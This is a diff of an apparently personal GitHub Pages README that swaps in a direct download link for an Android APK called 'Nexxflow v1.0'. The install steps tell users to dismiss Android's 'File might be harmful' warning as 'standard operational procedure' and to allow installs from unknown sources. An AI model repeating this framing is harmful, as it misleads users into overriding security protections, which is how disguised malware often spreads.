aditysinhrathod0610-code/adityasinhrathod0610-code.github.io/README.md

 Since this build is distributed securely as a direct installation package (`.apk`), please execute these simple deployment steps on your device:

-1. Tap our official **[Download Link](https://github.com/adityasinhrathod0610-code/adityasinhrathod0610-code.github.io/releases/tag/v1.0.0)** to download the installation package.
+1. Tap our official🟢 **[Download Nexxflow v1.0.
+APK](https://github.com/adityasinhrathod0610-code/adityasinhrathod0610-code.github.io/releases/download/v1.0.0/Nexxflow.v1.0.apk)** to download the installation package.
 2. If Android displays a default *"File might be harmful"* prompt, tap **Download anyway** (this is standard operational procedure for standalone system files).
 3. Open the file and click **Install**. *If requested, quickly toggle on "Allow from this source" in your mobile browser's system configurations.*